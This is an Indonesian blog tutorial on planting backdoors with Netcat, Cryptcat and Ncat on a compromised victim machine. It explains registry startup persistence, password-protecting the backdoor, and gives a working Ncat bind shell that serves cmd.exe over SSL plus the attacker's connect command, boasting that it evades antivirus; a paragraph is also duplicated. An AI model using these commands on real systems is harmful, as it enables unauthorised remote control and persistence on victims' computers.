Kali ini kita akan membahas tentang backdoor menggunakan Netcat, Cryptcat, Ncat yang biasa digunakan untuk membuat komunikasi antara 2 host atau yang biasa disebut "back connect" .
Netcat
Netcat digunakan sebagai backdoor. Setelah memperoleh akses ke mesin target, lalu membuat "netcat" agar berjalan pada startup dengan menambahkan pengaturan pada sistem registry. Dan kemudian attacker mendapatkan port yang terbuka untuk komunikasi antara attacker dengan victim. Berikut adalah tutorial tentang cara membuat netcat backdoor "netcat" menggunakan metasploit.
Namun perlu kita ketahui, ada beberapa kelemahan pada tools "netcat".
1. terdeteksi oleh antivirus
3. siapa saja yg berada dalam 1 jaringan dapat melihat aktifitas komunikasi anda dengan target ketika sedang menggunakan netcat, dan bahkan bisa langsung mengakses backdoor yang telah kita buat karena tidak ada proteksi password pada backdoor netcat yang telah dibuat.
Cryptcat
"cryptcat" = netcat + encryption
Cryptcat sama seperti netcat, namun terenkripsi dapat diproteksi dengan password.
Dalam kata lain
Pada OS Kali Linux & Backtrack sudah terinstall tools "cryptcat".
Pada OS yg belum terinstall "cryptcat" bisa mendownload sourcenya disini.
Dalam kata lain
Pada OS Kali Linux & Backtrack sudah terinstall tools "cryptcat".
Pada OS yg belum terinstall "cryptcat" bisa mendownload sourcenya disini.
- ekstrak menggunakan perintah tar -xvf cryptcat-unix-1.2.1.tar
- masuk ke direktori hasil ekstrak tadi cd unix
- compile menggunakan perintah make linux
untuk OS Windows, download source nya disini, lalu compile source menggunakan visual studio agar menjadi file dengan ektensi .exe .
Cara penggunaan "cryptcat" kurang lebih sama dengan "netcat", untuk lebih jelasnya gunakan perintah cryptcat -h .
root@kali:~# cryptcat -h
[v1.10]
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [-options] [hostname] [port]
options:
-e prog program to exec after connect [dangerous!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-k secret set the shared secret
-i secs delay interval for lines sent, ports scanned
-l listen mode, for inbound connects
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-s addr local source address
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning]
bisa kita lihat terdapat option -k untuk men set password pada backdoor yang akan kita buat.
Ncat
Ncat adalah projek dari Nmap yang telah mengembangkan beberapa bug yang ada pada tools "netcat".
Tools "ncat" untuk windows dapat di download disini.
contoh penggunaan "ncat", disini saya asumsikan IP address attacker & victim sebagai berikut:
attacker: 192.168.1.1
victim: 192.168.1.2
pada mesin victim:
ncat -lvp 445 --ssl -e cmd.exe --allow 192.168.1.1
maksud dari perintah diatas adalah koneksi menggunakan enkripsi ssl dan hanya memperbolekan IP 192.168.1.1
pada mesin attacker:
ncat 192.168.1.2 445 --ssl
untuk perintah option lainnya dapat dilihat menggunakan perintah ncat --help
dan tidak terdeteksi oleh antivirus
Bagikan
Backdoor Menggunakan Netcat, Cryptcat, Ncat
4/
5
Oleh
Unknown